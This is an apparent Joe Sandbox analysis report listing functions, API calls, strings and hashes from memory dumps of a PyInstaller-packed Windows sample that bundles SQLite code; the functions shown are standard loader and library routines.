Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 53fbc21aa26a1c8baebb89bf1b785cb32d0e9083d5ce3d1d857dcd68926cce1a
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 76216221B0CE46CAEA41BB7AACD61796290FF88F90F584231DE1DC339CDE2CD5918211

Function 00007FFDF8552720 Relevance: 15.2, APIs: 10, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDF8552748
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDF855279A
_RTC_Initialize.LIBCMT ref: 00007FFDF85527C8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDF85527EE
__scrt_release_startup_lock.LIBCMT ref: 00007FFDF8552819

Memory Dump Source

Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true

Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
Instruction ID: 93f26723bcc86e7a976eefd9349515c92706fb962fbd43825c6310ca93882c5f
Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
Instruction Fuzzy Hash: C381DF21F1C34347FB669B669C70A792291AF41788F448039D92D4F7DEDE3CE845A70A

Function 00007FF644886290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448862D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448866C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488695C

Strings

p, xrefs: 00007FF644886385
p, xrefs: 00007FF6448863FD
f, xrefs: 00007FF6448863F5
-, xrefs: 00007FF644886369
:, xrefs: 00007FF64488648C

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 00d9f1a30a038057ea36a85810fac9fbb01438922ab9e1257e04274049b1e1a2
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: DF129571E0C2878AFB20BF14D1966797691FB50750F884935EE8DA66CCDF3CE9809B10

Function 00007FF644880FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644881008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448813D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488166F

Strings

f, xrefs: 00007FF6448810A0
f, xrefs: 00007FF64488110A
f, xrefs: 00007FF644881255
p, xrefs: 00007FF6448810AD
p, xrefs: 00007FF644881112

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 1710dfed5af7060dc4ace23094578b604852e3ed78ce30615364b073edafc303
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: DF128672E1C1438AFB24BE14E0966B9B6A1FB40755F944135DEDAC6ACCDF7CE8809B10

Function 00007FFDFAF32140 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF321DA

Strings

temporary table name must be unqualified, xrefs: 00007FFDFAF3220E
there is already an index named %s, xrefs: 00007FFDFAF323EE
sqlite_master, xrefs: 00007FFDFAF3215F, 00007FFDFAF322C2, 00007FFDFAF32614
view, xrefs: 00007FFDFAF3226E, 00007FFDFAF32384
%s %T already exists, xrefs: 00007FFDFAF3237D
table, xrefs: 00007FFDFAF32275
sqlite_temp_master, xrefs: 00007FFDFAF32199, 00007FFDFAF3229D

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 1405196051-2846519077
Opcode ID: 3f3202799f0cd881bb3f695ed7ac0f0e3980f2b58005d14470d5ddecbe64b2ab
Instruction ID: 6d1eb0bac1cf792629891405347c708d2801b7278da2d759b79d8097ddc5c68b
Opcode Fuzzy Hash: 3f3202799f0cd881bb3f695ed7ac0f0e3980f2b58005d14470d5ddecbe64b2ab
Instruction Fuzzy Hash: C702C161B0879286EB28DB219420BB93790FF95BD4F0482B5EE6D4B7D9DF3CE5818700

Function 00007FFDFAEE09E0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FFDFAEE0AF7

Strings

:, xrefs: 00007FFDFAEE0A4C
winFullPathname1, xrefs: 00007FFDFAEE0ADC
winFullPathname2, xrefs: 00007FFDFAEE0B65
%s%c%s, xrefs: 00007FFDFAEE0A56
:, xrefs: 00007FFDFAEE0A11
?, xrefs: 00007FFDFAEE0A21
\, xrefs: 00007FFDFAEE0A68

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: 95529dcaa0ae4f9f9b80e21f1a4713639f067412f55fc70f80a129abc63d2c98
Instruction ID: fb27c8e67db8bd4f1c5f430da4590541e187aefbe8c36b78051973b0a127961a
Opcode Fuzzy Hash: 95529dcaa0ae4f9f9b80e21f1a4713639f067412f55fc70f80a129abc63d2c98
Instruction Fuzzy Hash: 3E51F521F4C28741FB29BB619475EBA6691AF85B88F0940B2DD6F037DECE3DE8458300

Function 00007FF644871050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF6448711FD
Failed to extract %s: failed to open archive file!, xrefs: 00007FF644871098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF644871108
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6448711F6
malloc, xrefs: 00007FF64487110F
fseek, xrefs: 00007FF6448710D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6448710CC

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
Instruction ID: 7459360ec29d47892f7ca7b3f226f9c7bfae7500f501a5feadf30b27caba8821
Opcode Fuzzy Hash: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
Instruction Fuzzy Hash: EB416F22B1C6528AEA10FB51AC926B96390FF85BC4F544432ED4C8BB9FDE3CE5058740

Function 00007FF644878660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF644873CBB), ref: 00007FF644878704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF644873CBB), ref: 00007FF64487870A
CreateDirectoryW.KERNEL32(?,00000000,00007FF644873CBB), ref: 00007FF64487874C

Part of subcall function 00007FF644878830: GetEnvironmentVariableW.KERNEL32(00007FF64487388E), ref: 00007FF644878867
Part of subcall function 00007FF644878830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF644878889

Part of subcall function 00007FF644888238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644888251

Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF64487877E
TMP, xrefs: 00007FF6448786C2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6448786DC
TMP, xrefs: 00007FF64487869C, 00007FF6448787A3
_MEI%d, xrefs: 00007FF644878712

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
Instruction ID: 40fb5a91a1e8ec0f6027071174944447d2761233b90d69bca2c88638ece993cd
Opcode Fuzzy Hash: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
Instruction Fuzzy Hash: CE416E21B1DA468CFA20F766A9E72B91291AF85BC0F804135ED0ED77DEEE3CE5018300

Function 00007FFDFAEE2C90 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 339COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEE304A

Strings

misuse, xrefs: 00007FFDFAEE2E39, 00007FFDFAEE2EA6
API called with finalized prepared statement, xrefs: 00007FFDFAEE2E0C, 00007FFDFAEE2E88
%s at line %d of [%.10s], xrefs: 00007FFDFAEE2E45, 00007FFDFAEE2EB2
ATTACH x AS %Q, xrefs: 00007FFDFAEE2D20
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAEE2D03, 00007FFDFAEE2E99
API called with NULL prepared statement, xrefs: 00007FFDFAEE2DF4

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
API String ID: 1405196051-1404302391
Opcode ID: bca8e14166ac8076eb2c5bfb264f1e696af0ae6fbc3cd14c769c7679af632c56
Instruction ID: f9f283fd72665895b1167758e3ba68eba8052b8c4f47ccd9517f980a7d9bd316
Opcode Fuzzy Hash: bca8e14166ac8076eb2c5bfb264f1e696af0ae6fbc3cd14c769c7679af632c56
Instruction Fuzzy Hash: D4F18D21B0AB4281FB68AF15A4A4B7933A4BF41B84F494175DE6E477E9CF3DE8819300

Function 00007FF64487EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF64487EA65

Part of subcall function 00007FF64487F9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF64487F9FF
Part of subcall function 00007FF64487F9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF64487FA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF64487EB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF64487ED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64487EE98

Strings

csm, xrefs: 00007FF64487EA7F
csm, xrefs: 00007FF64487EAE6
csm, xrefs: 00007FF64487EB60

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: f8330fd1725a1a2278a1144c19ed880de9d01afa05512aeb3700ab5d900907b7
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 86D15E22A0C7418AFB60FB6598923BDBBA0FB55788F104535DE4D97B9ADF38E491C700

Function 00007FF64488ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF64488F0AA,?,?,00000281A9BE9748,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE8C
GetProcAddress.KERNEL32(?,?,?,00007FF64488F0AA,?,?,00000281A9BE9748,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE98

Strings

ext-ms-, xrefs: 00007FF64488EDE9
api-ms-, xrefs: 00007FF64488EDD6

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 4861471d91912b6eac5c630d5e78980341220ec49ac5bb6e81186349b14b345c
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 8941CF61B1DA1289FA16FB16AC926752391FF49BA0F884539DD1DD778CEF3CE8498300

Function 00007FF644872C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
MessageBoxW.USER32 ref: 00007FF644872D99

Strings

%ls: , xrefs: 00007FF644872D22
[PYI-%d:ERROR] , xrefs: 00007FF644872CA6
<FormatMessageW failed.>, xrefs: 00007FF644872D70
Error, xrefs: 00007FF644872D8C

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: 9403c8673401f80a69e7cffd16a5ecb000d3d4a53e4aec06535fd581193eb089
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 1731E82270CB4146E720BB25B8916AA6691BFC8B98F414136EF4DD3B5DEF3CD506C300

Function 00007FFDFAF08F80 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFAF4D1A0), ref: 00007FFDFAF0911D

Strings

misuse, xrefs: 00007FFDFAF08FD7
API called with finalized prepared statement, xrefs: 00007FFDFAF08FAC
%s at line %d of [%.10s], xrefs: 00007FFDFAF08FE3
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAF08FCA
API called with NULL prepared statement, xrefs: 00007FFDFAF08F94

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 1405196051-3538577999
Opcode ID: c885a5a5644e3b07b7de876bd5e90a4aa787cbbbd2c3cc1aaf0c08ab861a816c
Instruction ID: 408d8c0053b19d15d7845e63cc83e5d6a7f67cdd389b13cd77eba81672bd4d60
Opcode Fuzzy Hash: c885a5a5644e3b07b7de876bd5e90a4aa787cbbbd2c3cc1aaf0c08ab861a816c
Instruction Fuzzy Hash: 5E51D425B0E66281FB189B619470A786391AF41BA0F4C82B1EE7D4F7DDEE3DE4418340

Function 00007FF64487DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD4D
GetLastError.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD85
FreeLibrary.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDF3
GetProcAddress.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDFF

Strings

api-ms-, xrefs: 00007FF64487DD6D

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 6a837562c8b4d135d430ccc6166c386bbaccc413c31492c88e02c2c725605bf4
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 9F318721B1EA42DAEE11FB169C925B527D4FF48BA4F598536DD2D87388EF3CE4448310

Function 00007FF644872A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF64487351A,?,00000000,00007FF644873F1B), ref: 00007FF644872AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF644872B0F
[PYI-%d:%s] , xrefs: 00007FF644872AA8
WARNING, xrefs: 00007FF644872AAF
0, xrefs: 00007FF644872B16
Warning, xrefs: 00007FF644872B1E

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

